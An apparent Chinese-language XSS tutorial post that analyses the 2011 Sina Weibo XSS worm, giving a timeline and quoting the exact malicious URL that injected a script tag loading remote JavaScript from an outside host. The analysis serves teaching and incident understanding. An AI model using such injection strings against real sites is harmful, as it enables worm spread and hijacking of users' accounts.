XSS第四节,XSS攻击实例(一)
2024-10-08 23:17:31
在开始实例的讲解之前,先看一下XSS的危害情况,第一张图中说明和XSS相关的CVE漏洞有7417个(http://web.nvd.nist.gov/view/vuln/search-results?query=xss&search_type=all&cves=on),第二张图说明在了乌云漏洞平台(www.wooyun.org)上和XSS相关的漏洞有2360个,足见XSS威力还是很大的。
这次举的例子是2011年6月28日新浪微博XSS攻击事件
事件的经过线索如下:
20:14,开始有大量带V的认证用户中招转发蠕虫
20:30,2kt.cn中的病毒页面无法访问
20:32,新浪微博中hellosamy用户无法访问
21:02,新浪漏洞修补完毕
新浪微博事件是利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,其通过http://163.fm/PxZHoxn 短链接服务,将链接指向:http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
其中的地址为:< script src="//www.2kt.cn/images/t.js"></script>,下面附一张来自腾讯科技的配图,
当时大多数分析者认为 Chrome 和 Safari 都没中招,IE、Firefox未能幸免。但IE8以后自动开启了XSS防御,所以普通用户使用IE8以上版本和Chrome以及Safari还是能防范普通XSS攻击的。
最新文章
- Python>;>;>;Flask框架使用之入门
- java如何得到GET和POST请求URL和参数列表(转)
- Eclipse开发Android程序如何在手机上运行
- PHP+socket+SMTP、POP3协议发送、接收邮件
- Revit二次开发-根据Element获取系统族信息
- bzoj 3218 a + b Problem(最小割+主席树)
- Largest product in a series
- iOS8模拟器键盘弹不出来
- ThinkPHP框架设计与扩展总结
- JS的className,字体放大缩小
- PHP机器学习库php-ml的简单测试和使用
- &#9733;10 个实用技巧,让Finder带你飞~
- Java多线程同步问题:一个小Demo完全搞懂
- Java课程寒假之开发记账本软件(Android版)之一
- ASS字幕制作
- MXNET:权重衰减
- vue2+animate.css
- C# MVC 使用 CKEditor图片上传 提示“不正确的服务器响应”
- 20155305mypwd的实现和测试
- 机器学习之路: python 朴素贝叶斯分类器 MultinomialNB 预测新闻类别